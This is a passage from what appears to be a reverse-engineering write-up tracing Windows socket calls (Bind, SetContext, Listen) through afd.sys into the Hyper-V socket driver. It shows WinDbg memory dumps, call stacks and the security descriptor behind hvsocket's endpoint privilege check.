<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f638 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000000 000003e9 00020026 00000008</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f648 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000000 00000000 00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f658 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000000 00000000 00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f668 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000000 00000000 1234191b 4ca74bf7</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f678 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> d7dfe086 45542bc3 00000004 00000610</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f688 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000022</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">90db8b89 4f790d35 ea49e98c – the buffer created by afd!AfdBind</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f698 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> cdb7c80a b1d00d3e 4570fe10 487662ad</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f6a8 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 1b7a9d77</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> fffffffe 00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f6b8 00000000 00000000 00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f6c8 00000000 00000000 00000000 00000030</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f6d8 00000022 00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Data processing again goes through FastIo. This time the function that handles the IOCTL is looked up in the AfdImmediateCallDispatch table; in our case the handler is afd!AfdSetContext. At the beginning, delivery of all APCs to the current thread is disabled with nt!KeEnterGuardedRegion, then the contents of UserBuffer are copied into one of the fields of the _AFD_CONNECTION structure. The function finishes with a call to nt!KeLeaveGuardedRegion, and control returns to the application.</span></div>
<ol start="3" style="margin-bottom: 0pt; margin-top: 0pt;"><ol start="3" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; list-style-type: decimal; margin-left: -36pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Listen</span></div>
</li>
</ol>
</ol>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next the server application calls Listen. We will not look at the user-mode part in detail and go straight to the function afd!AfdStartListen. As before, the call goes through ntdll!NtDeviceIoControlFile.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NTSTATUS WINAPI NtDeviceIoControlFile(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE FileHandle, - 144 (\Device\Afd\Endpoint).</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE Event, - 140 (Event)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PIO_APC_ROUTINE ApcRoutine, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID ApcContext, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PIO_STATUS_BLOCK IoStatusBlock, F6F798</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG IoControlCode, 1200B (afd!AfdStartListen)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID InputBuffer, </span><span style="background-color: transparent; color: #2f5496; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">F6F7A0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG InputBufferLength, C</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PVOID OutputBuffer, </span><span style="background-color: transparent; color: #2f5496; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG OutputBufferLength 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">F6F7A0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f7a0 00000100 7fffffff 00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In the kernel, InputBuffer is compared with AfdUserProbeAddress, then a SLIST_ENTRY is formed. In the _AFD_CONNECTION structure the field "type" is set to 0xAFD4. Next afd!AfdRefTLBaseEndpoint is called, then afd!AfdTLListen, from which hvsocket!VmbusTlProviderListen is called; then hvsocket!VmbusTlCreateEndpoint executes, which calls nt!PsChargeProcessPoolQuota with POOL_TYPE set to 200h (NonPagedPoolNx) and the current process. Then hvsocket!VmbusTlCreateObjectFromLookasideList is called, next nt!ExAllocatePoolWithTag with a buffer of size 130h and the Vnpi tag, then hvsocket!VmbusTlInitializeObject; after that a work queue is initialized (Netio!NetioInitializeWorkQueue) with the hvsocket!VmbusTlEndpointActionWorkQueueRoutine parameter, and finally hvsocket!VmbusTlAssociateListenerToPartition, from which hvsocket!VmbusTlFindAndReferencePartitionByContainerId is called.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>kc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlAssociateListenerToPartition</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlProviderListen</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdTLListen</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdStartListen</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!IopSynchronousServiceTail</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!IopXxxControlFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!NtDeviceIoControlFile</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then hvsocket!VmbusTlResolvePartitionId, then hvsocket!VmbusTlGetPartitionListenerEndpoint, from which hvsocket!VmbusTlFindOrCreateService is called; the function returns (rax is 0). Then there is a check of which partition we are working with: we receive HV_CHILDREN_GUID, call hvsocket!VmbusTlFindOrCreateService again, and then hvsocket!VmbusTlFindOrCreateService once more, which returns 0xC0000225 (in r14).</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next hvsocket!VmbusTlFindAndReferencePartition is called, then hvsocket!VmbusTlEndpointIsPrivileged, which performs the following sequence:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">call cs:__imp_SeCaptureSubjectContextEx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">lea rcx, [rbp+SubjectSecurityContext]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">call cs:__imp_SeLockSubjectContext</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">call cs:__imp_IoGetFileObjectGenericMapping</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Function returns _GENERIC_MAPPING struct:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dt _GENERIC_MAPPING @rax</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">combase!_GENERIC_MAPPING</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x000 GenericRead : 0x120089</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x004 GenericWrite : 0x120116</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x008 GenericExecute : 0x1200a0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x00c GenericAll : 0x1f01ff</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">then nt!SeAccessCheck and nt!ObDereferenceSecurityDescriptor. The result of hvsocket!VmbusTlEndpointIsPrivileged in one of the traces:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!error @rax</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Error code: (NTSTATUS) </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0xc0000022</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (3221225506) - {Access Denied} A process has requested access to an object, but has not been granted those access rights. (However, the low byte of the result is zeroed on exit.) </span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In hvsocket there is a VmbusTlEndpointSecurityDescriptor variable:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!sd hvsocket!VmbusTlEndpointSecurityDescriptor</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Revision: 0x1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Sbz1 : 0x0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Control : 0x4</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SE_DACL_PRESENT</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Owner : is NULL</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Group : is NULL</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->AclRevision: 0x2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Sbz1 : 0x0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->AclSize : 0x34</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->AceCount : 0x2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Sbz2 : 0x0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Ace[0]: ->AceFlags: 0x3</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Ace[0]: OBJECT_INHERIT_ACE</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Ace[0]: CONTAINER_INHERIT_ACE</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Ace[0]: ->AceSize: 0x14</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Ace[0]: ->Mask : 0x000f003f</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Ace[0]: ->SID: S-1-5-18</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Ace[1]: ->AceType: ACCESS_ALLOWED_ACE_TYPE</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Ace[1]: ->AceFlags: 0x3</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Ace[1]: OBJECT_INHERIT_ACE</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Ace[1]: CONTAINER_INHERIT_ACE</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Ace[1]: ->AceSize: 0x18</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Ace[1]: ->Mask : 0x000f003f</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Dacl : ->Ace[1]: ->SID: S-1-5-95-0</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">->Sacl : is NULL</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlEndpointIsPrivileged returns c0000000, and hvsocket!VmbusTlFindOrCreateService is called again.</span></div>
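<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
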